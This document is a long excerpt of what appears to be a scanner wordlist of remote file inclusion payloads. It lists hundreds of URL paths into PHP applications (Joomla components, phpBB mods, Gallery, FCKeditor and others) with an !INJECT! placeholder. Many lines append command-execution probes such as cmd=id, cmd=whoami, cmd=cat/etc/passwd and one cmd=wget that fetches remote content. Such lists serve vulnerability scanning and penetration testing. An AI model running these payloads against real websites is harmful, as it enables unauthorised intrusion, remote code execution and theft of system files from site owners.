-/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
-/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
-/components/core/connect.php?language_path=!INJECT!
-/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
-/components/minibb/index.php?absolute_path=!INJECT!?
-/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
-/compteur/mapage.php?chemin=!INJECT!
-/conf.php?securelib=!INJECT!
-/conf.php?securelib=!INJECT!?
-/config.inc.php3?rel_path=!INJECT!
-/config.inc.php?_path=!INJECT!
-/config.inc.php?path_escape=!INJECT!
-/config.inc.php?path_escape=!INJECT!%00
-/config.php?full_path=!INJECT!?
-/config.php?full_path_to_db=!INJECT!
-/config.php?fullpath=!INJECT!
-/config.php?incpath=!INJECT!
-/config.php?path_to_root=!INJECT!
-/config.php?rel_path=!INJECT!?
-/config.php?returnpath=!INJECT!
-/config.php?sql_language=!INJECT!?
-/config.php?xcart_dir=!INJECT!?
-/config/config_admin.php?INC=!INJECT!?
-/config/config_main.php?INC=!INJECT!?
-/config/config_member.php?INC=!INJECT!?
-/config/dbutil.bck.php?confdir=!INJECT!
-/config/mysql_config.php?INC=!INJECT!?
-/config/sender.php?ROOT_PATH=!INJECT!?
-/configuration.php?absolute_path=!INJECT!?
-/confirmUnsubscription.php?output=!INJECT!
-/connect.php?path=!INJECT!
-/connexion.php?DOCUMENT_ROOT=!INJECT!?
-/contact.php?blog_theme=!INJECT!
-/contacts.php?cal_dir=!INJECT!
-/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
-/content.php?content=!INJECT!
-/content/admin.php?pwfile=!INJECT!
-/content/content.php?fileloc=!INJECT!?
-/content/delete.php?pwfile=!INJECT!
-/content/modify.php?pwfile=!INJECT!
-/content/modify_go.php?pwfile=!INJECT!
-/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
-/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
-/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
-/controllers/MySQLController.php?baseDir=!INJECT!
-/controllers/SQLController.php?baseDir=!INJECT!
-/controllers/SetupController.php?baseDir=!INJECT!
-/controllers/VideoController.php?baseDir=!INJECT!
-/controllers/ViewController.php?baseDir=!INJECT!
-/convert-date.php?cal_dir=!INJECT!
-/convert/mvcw.php?step=1&vwar_root=!INJECT!
-/convert/mvcw.php?vwar_root=!INJECT!
-/core/admin/admin.php?p=admin&absoluteurl!INJECT!
-/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
-/core/admin/categories_add.php?absoluteurl!INJECT!
-/core/admin/categories_remove.php?absoluteurl!INJECT!
-/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
-/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
-/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
-/core/admin/login.php?absoluteurl!INJECT!
-/core/admin/pgRSSnews.php?absoluteurl!INJECT!
-/core/admin/showcat.php?absoluteurl!INJECT!
-/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
-/core/archive_cat.php?absoluteurl!INJECT!
-/core/archive_nocat.php?absoluteurl!INJECT!
-/core/aural.php?site_absolute_path=!INJECT!
-/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
-/core/editor.php?editor_insert_bottom=!INJECT!
-/core/includes.php?CMS_ROOT=!INJECT!?
-/core/recent_list.php?absoluteurl!INJECT!
-/corpo.php?pagina=!INJECT!
-/cp2.php?securelib=!INJECT!?
-/cpe/index.php?repertoire_config=!INJECT!
-/crea.php?plancia=!INJECT!
-/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
-/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
-/creat_news_all.php?language=!INJECT!
-/create_file.php?target=!INJECT!?
-/cron.php?ROOT_PATH=!INJECT!
-/cron.php?include_path=!INJECT!?
-/crontab/run_billing.php?config[include_dir]=!INJECT!?
-/cross.php?url=!INJECT!
-/custom_vars.php?sys[path_addon]=!INJECT!
-/customer/product.php?xcart_dir=!INJECT!
-/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
-/datei.php?config[root_ordner]=!INJECT!?&cmd=id
-/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
-/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
-/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
-/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
-/debugger.php?config_atkroot=!INJECT!
-/decoder/gallery.php?ccms_library_path=!INJECT!
-/decoder/markdown.php?ccms_library_path=!INJECT!
-/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
-/defines.php?WEBCHATPATH=!INJECT!?
-/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
-/depouilg.php3?NomVote=!INJECT!?
-/development.php?root_prefix=!INJECT!?
-/dfcode.php?DFORUM_PATH=!INJECT!?
-/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
-/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
-/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
-/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
-/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
-/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
-/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
-/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
-/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
-/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
-/digitaleye_Path/module.php?menu=!INJECT!?
-/dir/prepend.php?_PX_config[manager_path]=!INJECT!
-/dir_thatware/config.php?root_path=!INJECT!'
-/direct.php?rf=!INJECT!
-/direction/index.php?repertoire_config=!INJECT!
-/directory/index.php?path=!INJECT!
-/display.php?pag=!INJECT!
-/display.php?path=!INJECT!
-/displayCategory.php?basepath=!INJECT!
-/dix.php3?url_phpartenaire=!INJECT!
-/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
-/doc/admin/index.php?ptinclude=!INJECT!
-/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
-/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
-/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
-/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
-/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
-/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
-/docs/front-end-demo/cart2.php?workdir=!INJECT!?
-/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
-/dosearch.php?RESPATH=!INJECT!
-/download.php?root_prefix=!INJECT!?
-/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
-/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
-/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
-/downstat1.8/chart.php?art=!INJECT!?
-/dp_logs.php?HomeDir=!INJECT!
-/eXPerience2/modules.php?file=!INJECT!
-/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
-/edit.php?javascript_path=!INJECT!?
-/editor.php?newsfile=!INJECT!
-/editprofile.php?pathtohomedir=!INJECT!?
-/editsite.php?returnpath=!INJECT!
-/editx/add_address.php?include_dir=!INJECT!
-/elseif/contenus.php?contenus=!INJECT!
-/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
-/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
-/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
-/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
-/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
-/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
-/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
-/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
-/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
-/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
-/email_subscribe.php?root_prefix=!INJECT!?
-/embed/day.php?path=!INJECT!
-/enc/content.php?Home_Path=!INJECT!?
-/engine/Ajax/editnews.php?root_dir=!INJECT!
-/engine/api/api.class.php?dle_config_api=!INJECT!?
-/engine/engine.inc.php?absolute_path=!INJECT!
-/engine/init.php?root_dir=!INJECT!
-/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
-/enth3/show_joined.php?path=!INJECT!
-/environment.php?DIR_PREFIX=!INJECT!
-/epal/index.php?view=!INJECT!?
-/errors.php?error=!INJECT!
-/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
-/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
-/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
-/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
-/es_custom_menu.php?files_dir=!INJECT!
-/es_desp.php?files_dir=!INJECT!
-/es_offer.php?files_dir=!INJECT!
-/eshow.php?Config_rootdir=!INJECT!
-/esupport/admin/autoclose.php?subd=!INJECT!?
-/eva/index.php3?aide=!INJECT!?
-/eva/index.php3?perso=!INJECT!
-/eva/index.php?eva[caminho]=!INJECT!
-/event.php?myevent_path=!INJECT!
-/event_cal/module/embed/day.php?path=!INJECT!
-/eventcal2.php.php?path_simpnews=!INJECT!
-/eventscroller.php?path_simpnews=!INJECT!
-/example-view/templates/article.php?globals[content_dir]=!INJECT!?
-/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
-/example-view/templates/root.php?globals[content_dir]=!INJECT!?
-/example.php?site=!INJECT!
-/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
-/examplefile.php?bibtexrootrel=!INJECT!?
-/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
-/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
-/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
-/extras/mt.php?web_root=!INJECT!
-/extras/poll/poll.php?file_newsportal=!INJECT!
-/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
-/faq.php?module_root_path=!INJECT!
-/faq.php?phpbb_root_path=!INJECT!
-/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
-/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
-/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
-/fcring.php?s_fuss=!INJECT!
-/feed.php?config[root_ordner]=!INJECT!?&cmd=id
-/feed/index2.php?m=!INJECT!
-/files/amazon-bestsellers.php?CarpPath=!INJECT!
-/files/carprss.php?CarpPath=!INJECT!
-/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
-/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
-/files/compose-new.php3?BSX_LIBDIR=!INJECT!
-/files/compose-send.php3?BSX_LIBDIR=!INJECT!
-/files/folder-create.php3?BSX_LIBDIR=!INJECT!
-/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
-/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
-/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
-/files/folders.php3?BSX_LIBDIR=!INJECT!
-/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
-/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
-/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
-/files/message-delete.php3?BSX_LIBDIR=!INJECT!
-/files/message-forward.php3?BSX_LIBDIR=!INJECT!
-/files/message-header.php3?BSX_LIBDIR=!INJECT!
-/files/message-print.php3?BSX_LIBDIR=!INJECT!
-/files/message-read.php3?BSX_LIBDIR=!INJECT!
-/files/message-reply.php3?BSX_LIBDIR=!INJECT!
-/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
-/files/message-search.php3?BSX_LIBDIR=!INJECT!
-/findix/index.php?page=!INJECT!?&cmd=id
-/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
-/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
-/fonctions/template.php?repphp=!INJECT!?
-/fonctions_racine.php?chemin_lib=!INJECT!
-/footer.inc.php?settings[footer]=!INJECT!
-/footer.inc.php?tfooter=!INJECT!?
-/footer.php?footer_file=!INJECT!
-/footer.php?op[footer_body]=!INJECT!?
-/form.php?path=!INJECT!?&cmd=pwd
-/forum.php?cfg_file=1&fpath=!INJECT!?
-/forum/forum.php?view=!INJECT!
-/forum/forum82lib.php3?repertorylevel=!INJECT!?
-/forum/gesfil.php?repertorylevel=!INJECT!?
-/forum/lostpassword.php?repertorylevel=!INJECT!?
-/forum/mail.php?repertorylevel=!INJECT!?
-/forum/member.php?repertorylevel=!INJECT!?
-/forum/message.php?repertorylevel=!INJECT!?
-/forum/search.php?repertorylevel=!INJECT!?
-/forum/track.php?path=!INJECT!
-/frame.php?framefile=!INJECT!
-/ftp.php?path_local=!INJECT!
-/function.inc.php?path=!INJECT!
-/function.php?adminfolder=!INJECT!
-/function.php?gbpfad=!INJECT!
-/functions.php?include_path=!INJECT!
-/functions.php?pmp_rel_path=!INJECT!
-/functions.php?s[phppath]=!INJECT!
-/functions.php?set_path=!INJECT!?
-/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
-/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
-/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
-/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
-/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
-/galerie.php?config[root_ordner]=!INJECT!?cmd=id
-/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
-/gallery/lib/content.php?include=!INJECT!?cmd=ls
-/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
-/gallerypath/index.php?includepath=!INJECT!
-/games.php?id=!INJECT!
-/games.php?scoreid=!INJECT!
-/gbook/includes/header.php?abspath=!INJECT!?
-/gemini/page/forums/bottom.php?lang=!INJECT!?
-/gen_m3u.php?phpbb_root_path=!INJECT!
-/genepi.php?topdir=!INJECT!
-/generate.php?ht_pfad=!INJECT!?
-/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
-/gestArt/aide.php3?aide=!INJECT!?
-/get_session_vars.php?path_to_smf=!INJECT!
-/getpage.php?page=online&doc_path=!INJECT!
-/global.php?abs_path=!INJECT!?
-/gorum/dbproperty.php?appDirName=!INJECT!
-/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
-/gpb/include/gpb.inc.php?root_path=!INJECT!?
-/graph.php?DOCUMENT_ROOT=!INJECT!?
-/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
-/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
-/handlers/page/show.php?sous_rep=!INJECT!
-/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/header.inc.php?CssFile=!INJECT!
-/header.php?path=!INJECT!
-/header.php?wwwRoot=!INJECT!
-/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/help/index.php?show=!INJECT!
-/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
-/helperfunction.php?includedir=!INJECT!
-/hioxBannerRotate.php?hm=!INJECT!
-/hioxRandomAd.php?hm=!INJECT!
-/hioxstats.php?hm=!INJECT!
-/hioxupdate.php?hm=!INJECT!
-/home.php?a=!INJECT!
-/home.php?page=!INJECT!
-/home.php?pagina=!INJECT!
-/home/www/images/doc/index2.php?type=!INJECT!
-/home1.php?ln=!INJECT!
-/home2.php?ln=!INJECT!
-/hsList.php?subdir=!INJECT!?&cmd=ls
-/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
-/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
-/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
-/i_head.php?home=!INJECT!
-/i_nav.php?home=!INJECT!
-/iframe.php?file=!INJECT!
-/image.php?url=!INJECT!???
-/impex/ImpExData.php?systempath=!INJECT!
-/import.php?bibtexrootrel=!INJECT!?
-/importinfo.php?bibtexrootrel=!INJECT!?
-/in.php?returnpath=!INJECT!
-/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
-/inc/config.inc.php?x[1]=!INJECT!
-/inc/design.inc.php?dir[data]=!INJECT!
-/inc/download_center_lite.inc.php?script_root=!INJECT!
-/inc/formmail.inc.php?script_root=!INJECT!
-/inc/gabarits.php?cfg_racine=!INJECT!
-/inc/header.inc.php?ficStyle=!INJECT!
-/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
-/inc/inc.php?cfg_racine=!INJECT!?
-/inc/indexhead.php?fileloc=!INJECT!?
-/inc/irayofuncs.php?irayodirhack=!INJECT!?
-/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
-/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
-/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
-/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
-/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
-/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
-/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
-/inc/linkbar.php?cfile=!INJECT!?
-/inc/login.php?pathCGX=!INJECT!
-/inc/logingecon.php?pathCGX=!INJECT!
-/inc/ltdialogo.php?pathCGX=!INJECT!
-/inc/mtdialogo.php?pathCGX=!INJECT!
-/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
-/inc/prepend.inc.php?path=!INJECT!?
-/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
-/inc/settings.php?inc_dir=!INJECT!
-/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
-/inc/shows.inc.php?cutepath=!INJECT!?
-/inc/sige_init.php?SYS_PATH=!INJECT!?
-/inc_group.php?include_path=!INJECT!?
-/inc_manager.php?include_path=!INJECT!?
-/inc_newgroup.php.php?include_path=!INJECT!?
-/inc_smb_conf.php?include_path=!INJECT!?
-/inc_user.php?include_path=!INJECT!?
-/include.php?_APP_RELATIVE_PATH=!INJECT!
-/include.php?gorumDir=!INJECT!
-/include.php?myng_root=!INJECT!
-/include.php?path=psp/user.php&site=!INJECT!
-/include.php?path[docroot]=!INJECT!
-/include.php?sunPath=!INJECT!
-/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
-/include/HTML_oben.php?include_path=!INJECT!
-/include/HTML_oben.php?include_path=!INJECT!?
-/include/SQuery/gameSpy2.php?libpath=!INJECT!
-/include/bbs.lib.inc.php?site_path=!INJECT!
-/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
-/include/classes.php?INCLUDE_DIR=!INJECT!?
-/include/client.php?INCLUDE_DIR=!INJECT!?
-/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
-/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
-/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
-/include/common.php?XOOPS_ROOT_PATH=!INJECT!
-/include/common_functions.php?baros_path=!INJECT!?
-/include/config.inc.php?racine=!INJECT!
-/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
-/include/customize.php?l=!INJECT!&text=Hello%20World
-/include/default_header.php?script_path=!INJECT!
-/include/define.php?INC_DIR=!INJECT!?
-/include/disp_form.php3?cfg_include_dir=!INJECT!?
-/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
-/include/dom.php?path=!INJECT!
-/include/dtd.php?path=!INJECT!
-/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
-/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
-/include/forms.php?INCLUDE_DIR=!INJECT!?
-/include/global.php?pfad=!INJECT!
-/include/header.php?cs_base_path=!INJECT!?
-/include/html/nettools.popup.php?DIR=!INJECT!
-/include/inc.foot.php?root=!INJECT!
-/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
-/include/inc_freigabe.php?include_path=!INJECT!?
-/include/inc_freigabe1.php?include_path=!INJECT!?
-/include/inc_freigabe3.php?include_path=!INJECT!?
-/include/include_stream.inc.php?include_path=!INJECT!
-/include/include_top.php?g_include=!INJECT!
-/include/includes.php?include_path=!INJECT!
-/include/index.php3?cfg_include_dir=!INJECT!?
-/include/init.inc.php?G_PATH=!INJECT!
-/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
-/include/lib/lib_slots.php?main_path=!INJECT!
-/include/lib/lib_stats.php?main_path=!INJECT!?
-/include/lib/lib_users.php?main_path=!INJECT!?
-/include/little_news.php3?cfg_include_dir=!INJECT!?
-/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
-/include/loading.php?path_include=!INJECT!
-/include/mail.inc.php?root=!INJECT!
-/include/menu_builder.php?config[page_dir]=!INJECT!?
-/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
-/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
-/include/parser.php?path=!INJECT!
-/include/pear/IT.php?basepath=!INJECT!?
-/include/pear/ITX.php?basepath=!INJECT!?
-/include/pear/IT_Error.php?basepath=!INJECT!?
-/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
-/include/prodler.class.php?sPath=!INJECT!???
-/include/scripts/export_batch.inc.php?DIR=!INJECT!
-/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
-/include/scripts/send_email_cache.php?DIR=!INJECT!
-/include/startup.inc.php?root_path=!INJECT!?
-/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
-/include/timesheet.php?config[include_dir]=!INJECT!
-/include/urights.php?CRM_inc=!INJECT!
-/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
-/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
-/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
-/includes/ajax_listado.php?urlModulo=!INJECT!
-/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
-/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
-/includes/begin.inc.php?PagePrefix=!INJECT!
-/includes/blogger.php?path_prefix=!INJECT!
-/includes/class/class_tpl.php?cache_file=!INJECT!?
-/includes/class_template.php?quezza_root_path=!INJECT!
-/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
-/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
-/includes/common.php?module_root_path=!INJECT!?
-/includes/common.php?root=!INJECT!?
-/includes/common.php?root_path=!INJECT!?
-/includes/config.inc.php?racineTBS=!INJECT!
-/includes/config/master.inc.php?fm_data[root]=!INJECT!?
-/includes/connection.inc.php?PagePrefix=!INJECT!
-/includes/dbal.php?eqdkp_root_path=!INJECT!
-/includes/events.inc.php?PagePrefix=!INJECT!
-/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
-/includes/footer.inc.php?PagePrefix=!INJECT!
-/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
-/includes/functions.inc.php?sitepath=!INJECT!?
-/includes/functions.php?location=!INJECT!
-/includes/functions.php?phpbb_root_path=!INJECT!
-/includes/functions.php?phpbb_root_path=!INJECT!?
-/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
-/includes/functions/html_generate.php?path_prefix=!INJECT!
-/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
-/includes/functions/validations.php?path_prefix=!INJECT!
-/includes/functions_admin.php?phpbb_root_path=!INJECT!?
-/includes/functions_install.php?vwar_root=!INJECT!
-/includes/functions_kb.php?phpbb_root_path=!INJECT!?
-/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
-/includes/functions_portal.php?phpbb_root_path=!INJECT!?
-/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
-/includes/global.php?nbs=!INJECT!?
-/includes/header.inc.php?PagePrefix=!INJECT!
-/includes/header.inc.php?dateiPfad=!INJECT!
-/includes/include_once.php?include_file=!INJECT!
-/includes/init.php?includepath=!INJECT!?
-/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
-/includes/kb_constants.php?module_root_path=!INJECT!
-/includes/lang/language.php?path_to_root=!INJECT!
-/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
-/includes/logger_engine.php?phpbb_root_path=!INJECT!
-/includes/menuleft.inc.php?PagePrefix=!INJECT!
-/includes/mkb.php?phpbb_root_path=!INJECT!?ls
-/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
-/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
-/includes/mx_common.php?module_root_path=!INJECT!?
-/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
-/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
-/includes/pafiledb_constants.php?module_root_path=!INJECT!
-/includes/pages.inc.php?PagePrefix=!INJECT!
-/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
-/includes/profilcp_constants.php?module_root_path=!INJECT!?
-/includes/settings.inc.php?approot=!INJECT!
-/includes/template.php?myevent_path=!INJECT!
-/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
-/includes/tumbnail.php?config[root_ordner]=!INJECT!?
-/includes/usercp_register.php?phpbb_root_path=!INJECT!?
-/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
-/includes/xhtml.php?d_root=!INJECT!?
-/index.php3?Application_Root=!INJECT!
-/index.php?1=lol&PAGES[lol]=!INJECT!
-/index.php?AML_opensite=!INJECT!
-/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
-/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
-/index.php?ConfigDir=!INJECT!
-/index.php?DIR_PLUGINS=!INJECT!
-/index.php?G_JGALL[inc_path]=!INJECT!%00
-/index.php?HomeDir=!INJECT!
-/index.php?Lang=AR&Page=!INJECT!
-/index.php?Madoa=!INJECT!?
-/index.php?RP_PATH=!INJECT!
-/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
-/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
-/index.php?abg_path=!INJECT!?
-/index.php?abs_path=!INJECT!?
-/index.php?adduser=true&lang=!INJECT!
-/index.php?adodb=!INJECT!
-/index.php?ads_file=!INJECT!
-/index.php?arquivo=!INJECT!
-/index.php?back=!INJECT!
-/index.php?base==!INJECT!
-/index.php?basePath=!INJECT!
-/index.php?bibtexrootrel=!INJECT!?
-/index.php?blog_dc_path=!INJECT!
-/index.php?blog_theme=!INJECT!
-/index.php?body=!INJECT!
-/index.php?class_path=!INJECT!?
-/index.php?classified_path=!INJECT!?
-/index.php?cms=!INJECT!?
-/index.php?config["sipssys"]=!INJECT!
-/index.php?config[root_ordner]=!INJECT!?&cmd=id
-/index.php?config[root_ordner]=!INJECT!?cmd=id
-/index.php?config_atkroot=!INJECT!
-/index.php?configuration=!INJECT!
-/index.php?custom_admin_path=!INJECT!?
-/index.php?dateiPfad=!INJECT!?&cmd=ls
-/index.php?de=!INJECT!
-/index.php?dept=!INJECT!
-/index.php?do=!INJECT!
-/index.php?exec=!INJECT!?
-/index.php?ext=!INJECT!
-/index.php?faq_path=!INJECT!?&cmd=id
-/index.php?file_name[]=!INJECT!?
-/index.php?file_path=!INJECT!?
-/index.php?fileloc=!INJECT!
-/index.php?from=!INJECT!
-/index.php?func=!INJECT!?
-/index.php?function=!INJECT!
-/index.php?function=custom&custom=!INJECT!
-/index.php?gOo=!INJECT!
